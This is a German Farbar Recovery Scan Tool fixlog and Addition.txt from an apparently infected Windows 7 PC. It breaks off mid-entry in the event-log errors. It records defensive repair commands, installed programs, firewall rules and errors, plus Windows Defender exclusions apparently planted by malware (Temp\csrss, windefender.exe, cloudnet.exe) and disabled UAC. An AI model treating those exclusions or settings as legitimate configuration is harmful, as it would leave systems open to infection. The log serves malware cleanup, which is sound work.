02.01.2018  20:11    <DIR>          AMD
10.01.2018  20:24    <DIR>          ATI
11.03.2018  10:31    <DIR>          Axolot Games
02.01.2018  20:19    <DIR>          BFH_Test_Launcher
02.01.2018  19:32    <DIR>          CEF
02.01.2018  16:27    <DIR>          cFos
24.05.2018  18:36    <DIR>          ElevatedDiagnostics
01.03.2018  13:56    <DIR>          EpicGamesLauncher
27.05.2018  10:40    <DIR>          ESET
01.03.2018  14:58    <DIR>          FortniteGame
03.05.2018  20:47            64.480 GDIPFONTCACHEV1.DAT
02.01.2018  20:11    <DIR>          Logitech
27.05.2018  09:47    <DIR>          Microsoft
02.01.2018  17:19    <DIR>          Mozilla
02.01.2018  22:31    <DIR>          NVIDIA Corporation
20.05.2018  15:01    <DIR>          osu!
10.01.2018  10:22    <DIR>          Programs
02.01.2018  17:24    <DIR>          RadeonInstaller
07.01.2018  15:41    <DIR>          RadeonSettings
10.02.2018  10:17    <DIR>          Razer
10.02.2018  09:58    <DIR>          Razer_Inc
31.05.2018  13:44    <DIR>          Spotify
02.01.2018  19:32    <DIR>          Steam
01.06.2018  10:33    <DIR>          Temp
02.01.2018  22:30    <DIR>          TslGame
01.03.2018  14:58    <DIR>          UnrealEngine
01.03.2018  13:56    <DIR>          UnrealEngineLauncher
02.01.2018  16:16    <DIR>          VirtualStore
              1 Datei(en),        64.480 Bytes
              30 Verzeichnis(se), 836.000.112.640 Bytes frei

========= Ende von CMD: =========


========= dir "%CommonProgramFiles(x86)%" =========

 Volume in Laufwerk C: hat keine Bezeichnung.
 Volumeseriennummer: CC81-12A3

 Verzeichnis von C:\Program Files (x86)\Common Files

31.05.2018  14:13    <DIR>          .
31.05.2018  14:13    <DIR>          ..
25.04.2018  20:02    <DIR>          Adobe
25.05.2018  20:48    <DIR>          BattlEye
13.01.2018  16:31    <DIR>          DVDVideoSoft
02.01.2018  17:06    <DIR>          InstallShield
30.05.2018  09:52    <DIR>          microsoft shared
02.01.2018  17:15    <DIR>          PostureAgent
14.07.2009  05:20    <DIR>          Services
14.07.2009  05:20    <DIR>          SpeechEngines
20.05.2018  08:45    <DIR>          Steam
03.05.2018  05:15    <DIR>          System
              0 Datei(en),              0 Bytes
              12 Verzeichnis(se), 835.999.920.128 Bytes frei

========= Ende von CMD: =========


========= dir "%CommonProgramW6432%" =========

 Volume in Laufwerk C: hat keine Bezeichnung.
 Volumeseriennummer: CC81-12A3

 Verzeichnis von C:\Program Files\Common Files

31.05.2018  14:13    <DIR>          .
31.05.2018  14:13    <DIR>          ..
02.01.2018  17:32    <DIR>          ATI Technologies
30.05.2018  09:52    <DIR>          Microsoft Shared
14.07.2009  05:20    <DIR>          Services
14.07.2009  05:20    <DIR>          SpeechEngines
03.05.2018  05:15    <DIR>          System
              0 Datei(en),              0 Bytes
              7 Verzeichnis(se), 835.999.928.320 Bytes frei

========= Ende von CMD: =========


========= dir "%UserProfile%" =========

 Volume in Laufwerk C: hat keine Bezeichnung.
 Volumeseriennummer: CC81-12A3

 Verzeichnis von C:\Users\Nico

01.06.2018  10:33    <DIR>          .
01.06.2018  10:33    <DIR>          ..
06.01.2018  12:05    <DIR>          Aufnahmen
17.02.2018  09:51    <DIR>          BFH
03.05.2018  08:36    <DIR>          Contacts
01.06.2018  10:01    <DIR>          Desktop
27.05.2018  09:24    <DIR>          Documents
01.06.2018  10:33    <DIR>          Downloads
03.05.2018  08:36    <DIR>          Favorites
02.01.2018  17:14    <DIR>          Intel
03.05.2018  08:36    <DIR>          Links
03.05.2018  08:36    <DIR>          Music
12.05.2018  22:30    <DIR>          Pictures
03.05.2018  08:36    <DIR>          Saved Games
03.05.2018  08:36    <DIR>          Searches
03.05.2018  08:36    <DIR>          Videos
              0 Datei(en),              0 Bytes
              16 Verzeichnis(se), 835.999.842.304 Bytes frei

========= Ende von CMD: =========


========= dir "C:\" =========

 Volume in Laufwerk C: hat keine Bezeichnung.
 Volumeseriennummer: CC81-12A3

 Verzeichnis von C:\

31.05.2018  16:17    <DIR>          AdwCleaner
02.01.2018  17:36    <DIR>          AMD
27.05.2018  15:09    <DIR>          AppData
01.06.2018  10:33    <DIR>          FRST
27.05.2018  14:58                0 History
02.01.2018  17:12    <DIR>          Intel
31.05.2018  14:04        1.893.155 myexe.exe
14.07.2009  05:20    <DIR>          PerfLogs
31.05.2018  16:22    <DIR>          Program Files
27.05.2018  15:37    <DIR>          Program Files (x86)
02.01.2018  21:28    <DIR>          Riot Games
02.01.2018  16:16    <DIR>          Users
01.06.2018  10:33    <DIR>          Windows
              2 Datei(en),      1.893.155 Bytes
              11 Verzeichnis(se), 835.998.208.000 Bytes frei

========= Ende von CMD: =========

================== ExportKey: ===================

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions]
[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions]
[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths]
"C:\Windows"="0"
"C:\Windows\rss"="0"
"C:\Users\Nico\AppData\Roaming\EpicNet Inc\CloudNet"="0"
"C:\Users\Nico\AppData\Local\Temp\csrss"="0"
"C:\Users\Nico\AppData\Roaming\PatientSunset"="0"
"C:\Windows\windefender.exe"="0"
"C:\Users\Nico\AppData\Local\Temp\wup"="0"
"C:\Windows\System32\drivers"="0"
[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes]
"csrss.exe"="0"
"cloudnet.exe"="0"
"windefender.exe"="0"

=== Ende von ExportKey ===

========= RemoveProxy: =========

"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => erfolgreich entfernt
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt


========= Ende von RemoveProxy: =========


========= ipconfig /flushdns =========


Windows-IP-Konfiguration

Der DNS-Aufl”sungscache wurde geleert.

========= Ende von CMD: =========


========= netsh winsock reset catalog =========


Der Winsock-Katalog wurde zurckgesetzt.
Sie mssen den Computer neu starten, um den Vorgang abzuschlieáen.


========= Ende von CMD: =========


========= netsh advfirewall reset =========

OK.


========= Ende von CMD: =========


========= netsh advfirewall set allprofiles state ON =========

OK.


========= Ende von CMD: =========


========= Bitsadmin /Reset /Allusers =========


BITSADMIN version 3.0 [ 7.5.7601 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

0 out of 0 jobs canceled.

========= Ende von CMD: =========


=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 36661039 B
Java, Flash, Steam htmlcache => 165183668 B
Windows/system/drivers => 69174937 B
Edge => 0 B
Chrome => 0 B
Firefox => 393009119 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 66228 B
Public => 0 B
ProgramData => 0 B
systemprofile => 58583585 B
systemprofile32 => 22979380 B
LocalService => 66228 B
NetworkService => 185242 B
Nico => 310643623 B

RecycleBin => 321072 B
EmptyTemp: => 1015.9 MB temporäre Dateien entfernt.

================================


Das System musste neu gestartet werden.

==== Ende von Fixlog 10:35:56 ====
Addition.txt

Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 16.05.2018 01
durchgeführt von Nico (01-06-2018 10:42:14)
Gestartet von C:\Users\Nico\Downloads
Windows 7 Ultimate Service Pack 1 (X64) (2018-01-02 14:16:48)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-1284053026-2775073283-1402561352-500 - Administrator - Disabled)
ASPNET (S-1-5-21-1284053026-2775073283-1402561352-1002 - Limited - Enabled)
Gast (S-1-5-21-1284053026-2775073283-1402561352-501 - Limited - Disabled)
Nico (S-1-5-21-1284053026-2775073283-1402561352-1000 - Administrator - Enabled) => C:\Users\Nico

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 18.011.20040 - Adobe Systems Incorporated)
Adobe Flash Player 29 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 29.0.0.171 - Adobe Systems Incorporated)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 17.12.2 - Advanced Micro Devices, Inc.)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.) Hidden
Cisco LEAP Module (HKLM-x32\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.) Hidden
Cisco PEAP Module (HKLM-x32\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.) Hidden
Drakensang Online (HKLM-x32\...\Drakensang Online) (Version:  - )
Epic Games Launcher (HKLM-x32\...\{70843FAC-DA36-49CD-A9A1-6CB1665C9346}) (Version: 1.1.143.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{66C5838F-B854-4A55-89E6-A6138747A4DF}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 10.0.0.1204 - Intel Corporation)
Intel(R) Network Connections 19.1.51.0 (HKLM\...\PROSetDX) (Version: 19.1.51.0 - Intel)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 3.0.0.16 - Intel Corporation)
Intel® Chipsatz-Gerätesoftware (HKLM-x32\...\{60c073df-e736-4210-9c3a-5fc2b651cef3}) (Version: 10.1.1.7 - Intel(R) Corporation) Hidden
KeePass Password Safe 2.38 (HKLM-x32\...\KeePassPasswordSafe2_is1) (Version: 2.38 - Dominik Reichl)
Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
League of Legends (HKLM-x32\...\League of Legends 1.0) (Version: 1.0 - Riot Games, Inc)
Logitech Gaming Software 8.96 (HKLM\...\Logitech Gaming Software) (Version: 8.96.88 - Logitech Inc.)
Malwarebytes Version 3.5.1.2522 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.5.1.2522 - Malwarebytes)
Microsoft .NET Framework 1.1 (HKLM-x32\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version: 1.1.4322 - Microsoft)
Microsoft .NET Framework 4.7.1 (Deutsch) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1031) (Version: 4.7.02558 - Microsoft Corporation)
Microsoft .NET Framework 4.7.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.7.02558 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.10.25008 (HKLM-x32\...\{f1e7e313-06df-4c56-96a9-99fdfd149c51}) (Version: 14.10.25008.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.10.25008 (HKLM-x32\...\{c239cea1-d49e-4e16-8e87-8c055765f7ec}) (Version: 14.10.25008.0 - Microsoft Corporation)
Mozilla Firefox 60.0.1 (x64 de) (HKLM\...\Mozilla Firefox 60.0.1 (x64 de)) (Version: 60.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 60.0.1 - Mozilla)
MTA:SA v1.5.5 (HKLM-x32\...\MTA:SA 1.5) (Version: v1.5.5 - Multi Theft Auto)
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 20.1.3 - OBS Project)
OpenOffice 4.1.5 (HKLM-x32\...\{F0C909D7-D643-4628-8C6A-94073139F0CE}) (Version: 4.15.9789 - Apache Software Foundation)
osu! (HKLM-x32\...\{5fae645a-e4b4-4541-a037-7e4aa9f3e40a}) (Version: latest - ppy Pty Ltd)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7233 - Realtek Semiconductor Corp.)
RevServicesX (HKLM\...\{DDA8E261-B96C-4D2B-887F-D8AF1D7EF361}) (Version: 4.0.4 - SystemaRev) Hidden
Spotify (HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Spotify) (Version: 1.0.80.474.gef6b503e - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.1.7 - TeamSpeak Systems GmbH)
Vulkan Run Time Libraries 1.0.65.0 (HKLM\...\VulkanRT1.0.65.0) (Version: 1.0.65.0 - LunarG, Inc.) Hidden
WinRAR 5.50 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.50.0 - win.rar GmbH)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2017-08-11] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2017-08-11] (Alexander Roshal)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-05-09] (Malwarebytes)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2017-12-17] (Advanced Micro Devices, Inc.)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-05-09] (Malwarebytes)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2017-08-11] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2017-08-11] (Alexander Roshal)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {48AFC486-010B-4B4D-87F2-9F7C7EDA12AF} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-02-09] (Adobe Systems Incorporated)
Task: {57F4CA92-38A7-4B47-8B28-13BE860412BD} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-05-09] (Adobe Systems Incorporated)
Task: {657B38A1-8903-4F90-8E4D-E9C7AEFDC6FC} - System32\Tasks\StartDVR => C:\Program Files\AMD\CNext\CNext\dvrcmd.exe [2017-12-17] (Advanced Micro Devices, Inc.)
Task: {B51F287F-670C-42C3-A480-43546148601C} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [2017-12-17] (Advanced Micro Devices, Inc.)
Task: {CBF07082-94D0-43DD-961D-5221CC36D495} - System32\Tasks\Microsoft\Windows\Windows Activation Technologies\ValidationTask => C:\Windows\system32\Wat\WatAdminSvc.exe [2018-02-01] ()
Task: {D74FFB45-80D0-40D0-B76B-3411A9AA73A2} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_29_0_0_171_Plugin.exe [2018-05-09] (Adobe Systems Incorporated)
Task: {E3E11419-953A-4F4A-89E6-E6FE35B1A897} - System32\Tasks\ASUS\i-Setup161131 => C:\Windows\MEI\AsusSetup.exe [2013-08-22] (ASUSTeK Computer Inc.)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)


==================== Verknüpfungen & WMI ========================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)


==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2018-01-02 17:05 - 2014-01-28 05:16 - 000936728 _____ () C:\Program Files (x86)\ASUS\AXSP\1.02.00\atkexComSvc.exe
2018-05-31 16:22 - 2018-04-30 12:54 - 002493648 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
2018-05-31 16:22 - 2018-04-25 13:16 - 002297040 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\SelfProtectionSdk.dll
2015-03-07 02:07 - 2015-03-07 02:07 - 000908568 _____ () C:\Program Files\Logitech Gaming Software\libGLESv2.dll
2017-10-20 05:29 - 2017-10-20 05:29 - 001096824 _____ () C:\Program Files\Logitech Gaming Software\platforms\qwindows.dll
2015-03-07 02:07 - 2015-03-07 02:07 - 000060184 _____ () C:\Program Files\Logitech Gaming Software\libEGL.dll
2017-10-20 05:29 - 2017-10-20 05:29 - 000241784 _____ () C:\Program Files\Logitech Gaming Software\imageformats\qjpeg.dll
2017-10-20 05:02 - 2017-10-20 05:02 - 000077824 _____ () C:\Program Files\Logitech Gaming Software\LAClient\zlib.dll
2017-10-20 05:02 - 2017-10-20 05:02 - 000144896 _____ () C:\Program Files\Logitech Gaming Software\LAClient\libssh2.dll
2018-01-02 17:05 - 2018-06-01 10:37 - 000033280 _____ () C:\Program Files (x86)\ASUS\AXSP\1.02.00\PEbiosinterface32.dll
2018-01-02 17:05 - 2014-01-28 05:16 - 000104448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.02.00\ATKEX.dll
2017-12-17 22:06 - 2017-12-17 22:06 - 000357256 _____ () C:\Windows\SysWOW64\GameManager32.dll
2018-01-02 19:30 - 2018-05-01 09:32 - 000788256 _____ () C:\Program Files (x86)\Steam\SDL2.dll
2018-01-02 19:30 - 2016-09-01 03:02 - 004969248 _____ () C:\Program Files (x86)\Steam\v8.dll
2018-01-02 19:30 - 2016-09-01 03:02 - 001563936 _____ () C:\Program Files (x86)\Steam\icui18n.dll
2018-01-02 19:30 - 2016-09-01 03:02 - 001195296 _____ () C:\Program Files (x86)\Steam\icuuc.dll
2018-01-02 19:30 - 2018-05-19 01:01 - 002632480 _____ () C:\Program Files (x86)\Steam\video.dll
2018-01-02 19:30 - 2017-12-20 03:43 - 005137696 _____ () C:\Program Files (x86)\Steam\libavcodec-57.dll
2018-01-02 19:30 - 2017-12-20 03:43 - 000847136 _____ () C:\Program Files (x86)\Steam\libavutil-55.dll
2018-01-02 19:30 - 2017-12-20 03:43 - 000695584 _____ () C:\Program Files (x86)\Steam\libavformat-57.dll
2018-01-02 19:30 - 2017-12-20 03:43 - 000351520 _____ () C:\Program Files (x86)\Steam\libavresample-3.dll
2018-01-02 19:30 - 2017-12-20 03:43 - 000783648 _____ () C:\Program Files (x86)\Steam\libswscale-4.dll
2018-01-02 19:30 - 2018-05-19 01:01 - 000979232 _____ () C:\Program Files (x86)\Steam\bin\chromehtml.DLL
2018-01-02 19:30 - 2016-07-05 00:17 - 000266560 _____ () C:\Program Files (x86)\Steam\openvr_api.dll
2018-01-02 19:31 - 2018-05-01 09:32 - 000788256 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\SDL2.dll
2018-01-02 19:31 - 2018-05-14 21:39 - 083524384 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\libcef.dll
2018-01-02 19:30 - 2015-09-25 01:52 - 000119208 _____ () C:\Program Files (x86)\Steam\winh264.dll
2018-01-02 19:31 - 2018-05-14 21:39 - 002253600 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\swiftshader\libglesv2.dll
2018-01-02 19:31 - 2018-05-14 21:39 - 000109856 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\swiftshader\libegl.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)


==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2009-07-14 04:34 - 2018-06-01 10:33 - 000000035 _____ C:\Windows\system32\Drivers\etc\hosts


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Nico\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==


==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [TCP Query User{3BA89802-EE14-46F8-A794-2A739BF5F99A}C:\program files\amd\cnext\cnext\radeonsettings.exe] => (Block) C:\program files\amd\cnext\cnext\radeonsettings.exe
FirewallRules: [UDP Query User{C1155520-3B6F-4E4A-AC89-91381F99D08A}C:\program files\amd\cnext\cnext\radeonsettings.exe] => (Block) C:\program files\amd\cnext\cnext\radeonsettings.exe
FirewallRules: [{40E49BB6-ABF0-47CB-B218-019E701E0804}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{AF5FA658-5740-4813-9449-2D931B2F3309}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{AFEE751F-FF72-402F-8133-F76B7A82208B}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{24513EE5-D297-4D68-85F5-1CCB96F8D2E9}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{D46D3F74-B919-457B-8B8B-3F642FECFF77}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{8A83AE2D-91DB-427A-B27C-8C00514F265B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [TCP Query User{C08C2554-A723-4AE2-A5FF-7AF5B5B63745}C:\program files\logitech gaming software\lcore.exe] => (Block) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [UDP Query User{94F28652-E20A-47DC-B119-43217FB92837}C:\program files\logitech gaming software\lcore.exe] => (Block) C:\program files\logitech gaming software\lcore.exe

==================== Wiederherstellungspunkte =========================

01-06-2018 00:17:39 Geplanter Prüfpunkt

==================== Fehlerhafte Geräte im Gerätemanager =============


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (06/01/2018 10:37:17 AM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.

Error: (05/31/2018 09:30:52 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: AsusSetup.exe, Version: 2.0.20.2, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: unknown, Version: 0.0.0.0, Zeitstempel: 0x00000000
Ausnahmecode: 0x00000000
Fehleroffset: 0x00000000
ID des fehlerhaften Prozesses: 0x7b0
Startzeit der fehlerhaften Anwendung: 0x01d3f915e0c98213
Pfad der fehlerhaften Anwendung: C:\Windows\MEI\AsusSetup.exe
Pfad des fehlerhaften Moduls: unknown
Berichtskennung: 20bf9f77-6509-11e8-bc5e-10c37b6f5940

Error: (05/31/2018 09:30:48 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.

Error: (05/31/2018 04:28:49 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.

Error: (05/31/2018 04:18:19 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.

Error: (05/31/2018 04:06:36 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.

Error: (05/31/2018 02:19:46 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programm NOTEPAD.EXE, Version 6.1.7601.18917 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Wartungscenter-Systemsteuerung, um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: ca4

Startzeit: 01d3f8d9a23650b5

Endzeit: 497

Anwendungspfad: C:\Windows\system32\NOTEPAD.EXE

Berichts-ID: e4a6dc91-64cc-11e8-9a9a-10c37b6f5940

Error: (05/31/2018 02:04:05 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.


Systemfehler:
=============
Error: (06/01/2018 10:39:21 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Intel(R) Management and Security Application Local Management Service" wurde aufgrund folgenden Fehlers nicht gestartet:
Das System kann die angegebene Datei nicht finden.

Error: (06/01/2018 09:56:19 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "SPP-Benachrichtigungsdienst" wurde mit folgendem Fehler beendet:
Zugriff verweigert

Error: (06/01/2018 08:56:19 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "SPP-Benachrichtigungsdienst" wurde mit folgendem Fehler beendet:
Zugriff verweigert

Error: (06/01/2018 07:56:19 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "SPP-Benachrichtigungsdienst" wurde mit folgendem Fehler beendet:
Zugriff verweigert

Error: (06/01/2018 06:56:19 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "SPP-Benachrichtigungsdienst" wurde mit folgendem Fehler beendet:
